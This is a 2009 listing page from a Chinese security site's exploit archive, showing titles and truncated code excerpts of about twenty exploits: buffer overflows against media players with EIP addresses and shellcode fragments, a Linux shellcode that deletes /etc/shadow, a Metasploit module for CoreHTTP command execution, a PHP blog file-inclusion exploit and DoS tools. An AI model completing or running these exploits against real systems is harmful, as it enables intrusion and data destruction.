首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>Exploits>列表
CastRipper 2.50.70 (.pls) Stack buffer Overflow Exploit WinXP SP3
  日期:2009-12-25 13:45:20 点击:50 评论:0
#!/usr/bin/perl # CastRipper 2.50.70 (.pls)Stack buffer Overflow Exploit WinXP SP3 # Exploite By : d3b4g # my webpage www.d3b4g.info # From tiny islands of maldivies # Tested on Windows XP SP3 # 24.12.2009 # I used Adress from SHELL32.dll.You can ch
Exploit for against Easy RM to MP3 2.7.3.700
  日期:2009-12-24 10:18:35 点击:109 评论:0
#!/usr/bin/python # Exploit for against Easy RM to MP3 2.7.3.700 # 12.2.2009 # Author: Ron Henry - rlh@ciphermonk.net - dijital1 # Version: Easy RM to MP3 2.7.3.700 # Tested against WinXP SP3 - English outputfile = astley.m3u shellcode=A * 26071 #Of
Easy RM to MP3 27.3.700 local BOF xp sp2
  日期:2009-12-24 10:17:10 点击:40 评论:0
// Exploit Title: Easy RM to MP3 27.3.700 local Buffer OverFlow Exploit on xp sp2 // Date: 24/12/2009 // Author: bibi-info // Software Link: http://www.rm-to-mp3.net/EasyRMtoMP3Converter.exe // Version: 27.3.700 // Tested on: Windows Xp sp2 // greet
Adobe Reader and Acrobat (CVE-2009-4324) Exploit
  日期:2009-12-24 10:16:35 点击:98 评论:0
# # Author : Ahmed Obied ( ahmed.obied@gmail.com ) # # This program generates a PDF file that exploits a vulnerability (CVE-2009-4324) # in Adobe Reader and Acrobat. The generated PDF file was tested using Adobe # Reader 9.2.0 on Windows XP SP3. The
Printoxx Local Buffer Overflow
  日期:2009-12-24 10:16:00 点击:39 评论:0
# Exploit Title: Printoxx Local Buffer Overflow # Date: 23 Dec, 2009 # Author: sandman, n4mdn4s [4T] gmail [D0T] com # Software Link: http://kornelix.squarespace.com/printoxx/ , http://kornelix.squarespace.com/storage/downloads/printoxx-2.1.2.tar.gz
linux 2.6.18-20 2009 Local Root Exploit
  日期:2009-12-24 10:14:55 点击:488 评论:0
# Author: DigitALL # Version: 2.6.18-20 # Tested on: Linux System # Greetz To: Zombie KroNicKq and All 1923turk.Biz Members # Code : 2.6.18 2008 Exploit's #304;s Edited 2009 Version.I Am Tested 2.6.18-20 2009 Linux is Rooted.Coming Soon.By DigitALL
corehttp remote command execution(meta)
  日期:2009-12-24 10:10:49 点击:82 评论:0
##### MSF Exploit for CoreHTTP CGI Enabled Remote Arbitrary Command Execution## CoreHTTP fails to properly sanitize user input before passing it to popen,## allowing anyone with a web browser to run arbitrary commands.## No CVE for this yet.###requi
Simple PHP Blog v0.5.1 Local File Inclusion Vulnerability
  日期:2009-12-23 10:44:36 点击:28 评论:0
# Simple PHP Blog is prone to a local file-include vulnerability because it fails to properly # sanitize user-supplied input. #An attacker can exploit this vulnerability to obtain potentially sensitive information or to #execute arbitrary local scri
TFTP Daemon v1.9 Denial of Service Exploit
  日期:2009-12-23 10:41:44 点击:48 评论:0
/################################################ // //Vulnerability: Remote Buffer Overflow Exploit //Impact: Remote Denial of Service Attack //Vulnerable Application: TFTP Daemon Version 1.9 //Tested on Windows XP Service Pack II // //Author: Sock
Easy RM to MP3 27.3.700 WinXP SP3
  日期:2009-12-23 10:41:05 点击:74 评论:0
# # Exploit for Easy RM to MP3 27.3.700 on Windows Xp sp3 # By d3b4g # tested on Windows XP SP3 # version:27.3.700 # Date:22.12.09 # From tiny islands of maldivies # my $file= d3b4g.m3u; my $junk= A x 26071; my $eip = pack('V',0x7C836A08); #jmp esp
PlayMeNow Malformed (M3U) Universal XP Seh BoF
  日期:2009-12-23 10:40:34 点击:29 评论:0
############################################################## # Author: ThE g0bL!N # Tested on: xp sp2,sp3 #Grrets: His0k4 Alone :) ############################################################## my $shellcode = x31xc9x83xe9xdexd9xeexd9x74x
CoolPlayer 2.18 M3U Playlist Buffer Overflow Exploit
  日期:2009-12-23 10:34:52 点击:49 评论:0
#!/usr/bin/perl # Versions affected: 2.18 # Tested on: Windows XP Pro SP2 # Author: data$hack # Usage: expl.pl my $file= exs3.m3u; my $junk= A x 223; my $eip = pack('V',0x7C836940); #jmp esp from kernel my $shellcode = x90 x 10; $shellcode = $shell
Winamp <= 5.57 Stack Overflow
  日期:2009-12-23 10:19:58 点击:29 评论:1
# Exploit Title: Winamp = 5.57 Stack Overflow # Date: 22 Dec 2009 # Author: scriptjunkie, scriptjunkie.1 {nospam} googlemail {nospam} com # Software Link: http://www.winamp.com/media-player # Version: 5.57, 5.56 # Tested on: Windows XP, Windows 7 #
3Com OfficeConnect Routers DoS (Content-Type)
  日期:2009-12-22 10:01:43 点击:31 评论:0
############### # Model - Tested on 3Com OfficeConnect ADSL Wireless 11g Firewall Router 3CRWDR100A-72 and 3CRWDR100Y-72 # Software Version - Tested on 2.06T13 (Apr 2007, last version for these routers) # Attacker - Tested from GNU/Linux (Sidux and
TLS Renegotiation Vulnerability PoC Exploit
  日期:2009-12-22 10:00:46 点击:116 评论:0
#!/usr/bin/env python ###################################### # # # RedTeam Pentesting GmbH # # kontakt@redteam-pentesting.de # # http://www.redteam-pentesting.de # # # ###################################### # PoC exploit for the TLS renegotiation vu
PlayMeNow Malformed M3U Playlist Buffer Overflow(SEH)
  日期:2009-12-22 09:59:58 点击:27 评论:0
#!/usr/bin/perl #Greets: His0k4 :) Then His0k4 and After That His0k4 #Special Greets :01000001 01101001 01100011 01101000 01100001 00100000 ################################################################## # win32_exec - EXITFUNC=seh CMD=calc Size=1
Simple PHP Blog <= 0.5.1 Local File Include Exploit
  日期:2009-12-22 09:58:39 点击:38 评论:0
#!/usr/bin/perl # Local File Include Exploit # Simple PHP Blog = 0.5.1 # jgaliana at isecauditors=dot=com # Internet Security Auditors use LWP::UserAgent; if ($#ARGV 3) { die(Usage: $0 site path file cookie); } $ua = LWP::UserAgent-new; $ua-agent(Si
Linux - setreuid (0,0) & execve(/bin/rm /etc/shadow)
  日期:2009-12-21 14:19:24 点击:48 评论:0
/* rmtheshadow.c by mr_me Just for fun :) visit: http://www.corelan.be:8800/ */ #include stdio.h #include string.h char sc[] = x31xc0 // xor %eax,%eax xb0x46 // mov $0#65533;46,%al x31xdb // xor %ebx,%ebx x31xc9 // xor %ecx,%ecx xcdx80 // int $0#655
Win32 XP SP3 ShellExecuteA shellcode
  日期:2009-12-21 14:18:44 点击:93 评论:0
; Author: sinn3r ; Tested on Windows XP SP3 ; Description: ; This shellcode will attempt to delete the Zone.Identifier ADS (it's a ; trick Microsoft uses to warn you about an exe when you try to run it), ; and then run the file using the ShellExecut
PlayMeNow Malformed M3U Playlist WinXP Universal BOF
  日期:2009-12-21 14:18:11 点击:35 评论:0
#!/usr/bin/python # Vulnerability: PlayMeNow Malformed M3U Playlist WinXP Universal BoF # Product:PlayMeNow - media player. # Versions affected: Tested with 7.3 and 7.4 # Tested on: Windows XP Pro SP2/3 Home SP3 # Author: loneferret # Original Autho
共637页/12733条记录 首页 上一页 [411] [412] [413] 414 [415] [416] [417] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  漏洞资料
  入侵实例
  系统安全
  网络安全
  网络基础
  病毒分析
Exploits
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved